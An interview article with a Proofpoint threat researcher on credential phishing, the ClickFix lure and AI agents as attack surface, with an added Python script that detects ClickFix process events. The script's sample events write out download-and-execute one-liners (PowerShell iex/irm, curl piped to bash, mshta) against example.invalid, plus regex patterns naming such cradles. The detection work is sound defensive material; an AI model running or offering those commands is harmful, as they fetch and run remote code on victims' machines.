Taking threat intelligence seriously: an imperative for organizations
Daniel Blackford, Senior Director of Threat Research at Proofpoint, believes threat detection is going to get harder as more AI agents are deployed.
For Daniel Blackford, Senior Director of Threat Research at Proofpoint, threats in the region are becoming increasingly rampant and sophisticated as the cybercrime ecosystem has matured and built itself up over the last 15 to 20 years.
He believes that so much money has flowed into the cybercrime ecosystem from breaches that new participants are incentivized to join, be recruited, and start a life of cybercrime.
“We're really seeing globally distributed threats at this point. Customers in every region recognize that they're going to have to improve their security capabilities. Most of the customers that I've talked to have at least given the indication that they understand what it is,” said Blackford.
For Blackford, while cybersecurity vendors have intelligence provided by their customers, customers themselves need to be looking at all of the sources they can protect, and not just their perimeter.
“We (Proofpoint) have to protect the world's perimeter. We have real data, like proprietary data, that helps. There are a lot of cases where even big intelligence vendors go in and do incident response, and they get their data through that process, but they don't necessarily have active sensors that things are going through to kind of feed them. So, the fact that we do have that is great,” he explained.
Blackford added that Proofpoint partners with many international law enforcement, governmental and intelligence agencies, and that the parties are able, in a curated fashion, to tip each other off.
Taking threat intelligence seriously
Even as businesses begin to understand the importance of relying on threat intelligence, Blackford feels that areas like generic credential harvesting and phishing are still not being taken seriously enough.
“It's an order of magnitude higher than what we see with, for example, malware payloads being directly distributed. And I think more than ever, threat actors are realizing that account takeover can lead them to a lot of the same kind of endpoints that actually getting malicious software on a system will do. It's like you get access to an account, you get access to an inbox; they're going to have access to some data, to some systems and such. They can now send email internally coming from a trusted source; they can add apps. They can even give permission to second- and third-party apps,” he explained.
“I don't think that's being taken seriously enough,” he added.
The other technique being used to deliver multiple different kinds of threats is a social-engineering lure called ClickFix, whereby a user is presented with some content. It might be a document, an HTML file, or an actual website, and the user often has to pass a CAPTCHA. Even if they complete it successfully, the threat actor's page claims the check failed and that it could not verify they are human, so it tells the user it cannot authenticate them and needs more from them before it will grant access to the content.
“What they ask you to do is copy and paste it into a terminal. It seems like you're familiar with the technique, but the fact is that so many different actors are using it, like ones that would previously be associated with fake updates, because DPRK, China and Russia have all used it. It's being embraced so broadly, and to me it's counterintuitive. I don't know why people would paste it, but it's successful. And there's been a 400% year-over-year increase in that,” he added.
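The lure described above ends with the victim pasting a one-liner into a terminal or the Windows Run dialog, which is also where it is easiest to catch. The following detection logic is an added example written for this page; it is not Proofpoint's code and nothing in it comes from the interview. It runs over constructed process-creation events (Sysmon Event ID 1 style fields) and flags the shape ClickFix produces: a user-facing parent (explorer.exe hosting the Run dialog, a browser, or a terminal) spawning a shell or living-off-the-land binary whose command line fetches and executes remote content. The parent/child lists, the command-line regexes (download-and-execute cradles, hidden windows, encoded commands, the trailing "I am not a robot" comment) and the `example.invalid` hostnames are all assumptions drawn from common reporting, not from the page.

```python
import re
from dataclasses import dataclass

# Parents a pasted command realistically runs under (assumption, not from the page):
# explorer.exe hosts the Win+R "Run" dialog, browsers host the lure page itself,
# and a terminal/shell is where the page tells the user to paste.
USER_PARENTS = {
    "explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
    "windowsterminal.exe", "cmd.exe", "powershell.exe",
    "terminal", "iterm2", "bash", "zsh", "sh",
}
# Interpreters and living-off-the-land binaries the pasted one-liner invokes (assumption).
SUSPECT_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe",
    "curl", "bash", "sh", "zsh", "osascript",
}
# Command-line indicators (assumed from common reporting): download-and-execute
# cradles, hidden windows, encoded commands, and the trailing "I am not a robot"
# comment the lure appends so the pasted line looks like a verification token.
PATTERNS = [
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"\birm\b|invoke-restmethod|\biwr\b|invoke-webrequest|downloadstring", re.I),
    re.compile(r"-(w|windowstyle)\s+hidden", re.I),
    re.compile(r"-(e|enc|encodedcommand)\s+[a-z0-9+/=]{20,}", re.I),
    re.compile(r"mshta(\.exe)?\s+https?://", re.I),
    re.compile(r"\bcurl\b[^|]*\|\s*(ba|z)?sh\b", re.I),
    re.compile(r"#.*(i am not a robot|verification|captcha)", re.I),
]


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def score_event(ev: ProcEvent):
    """Return (score, reasons). Each matched heuristic adds one point, so a
    user-facing parent spawning a shell scores 1 on its own and needs at least
    one command-line indicator to cross the alert threshold."""
    reasons = []
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if parent in USER_PARENTS and child in SUSPECT_CHILDREN:
        reasons.append(f"user-facing parent {parent} spawned {child}")
    for pat in PATTERNS:
        if pat.search(ev.command_line):
            reasons.append(f"command line matches /{pat.pattern}/")
    return len(reasons), reasons


def find_clickfix(events, threshold: int = 2):
    """Return [(event, reasons)] for events scoring at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, reasons))
    return hits


# Constructed sample telemetry; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iex (irm https://example.invalid/verify)" '
              '# I am not a robot - reCAPTCHA Verification ID: 8421'),          # ClickFix via Run dialog
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),         # benign admin script
    ProcEvent("/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "/bin/bash",
              'bash -c "curl -fsSL https://example.invalid/fix.sh | bash"'),      # macOS terminal variant
    ProcEvent("/bin/bash", "/usr/bin/curl",
              "curl -fsSL https://example.invalid/release.tar.gz -o release.tar.gz"),  # benign download
    ProcEvent(r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/check.hta"),                        # browser-launched mshta
]

if __name__ == "__main__":
    for ev, reasons in find_clickfix(SAMPLE_EVENTS):
        print(f"ALERT {_basename(ev.parent_image)} -> {_basename(ev.image)}: {ev.command_line}")
        for r in reasons:
            print("   ", r)
```

The threshold of two is deliberate: an admin launching PowerShell from Explorer, or a developer running curl from bash, scores one and stays quiet, while the pasted lure carries at least one cradle or hidden-window flag on top of the parent/child relationship. In a real pipeline the events would come from Sysmon, EDR or macOS unified logging rather than the inline list, and on Windows the Run dialog's `RunMRU` registry key retains the pasted text even when process telemetry is missing.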
AI and threats
Blackford also believes the mass adoption of agentic AI represents the largest increase in attack surface since perhaps the mass migration to the cloud.
“Cybercrime is never going to be defeated. There are always going to be criminals. There's always going to be vulnerable technologies and new versions of things coming out. Will we be able to predict things? I think that even with more data, even with more vendors, even with more intelligence than ever, I think we're at a period with the oncoming agentic future that we're less able to predict what is going to happen than ever before. So, it's going to be harder,” said Blackford.
Blackford believes that organizations need to iterate through this process. AI agents are much more advanced now than they were six months ago. In six months' time, he foresees that more businesses will have developed agents around their own specific use cases, and that there will probably be an order of magnitude more publicly facing MCP (Model Context Protocol) servers out there.
“As these things happen in stages, threat actors will pivot to take advantage of them where they are in that stage, and then there'll be a response, and then there'll be a response to the response. Things will develop quickly, but iteratively, and maybe once we're a little deeper into those waters we'll be at a point where we can predict how the future is going to go. But right now, it looks wide open to me,” he concluded.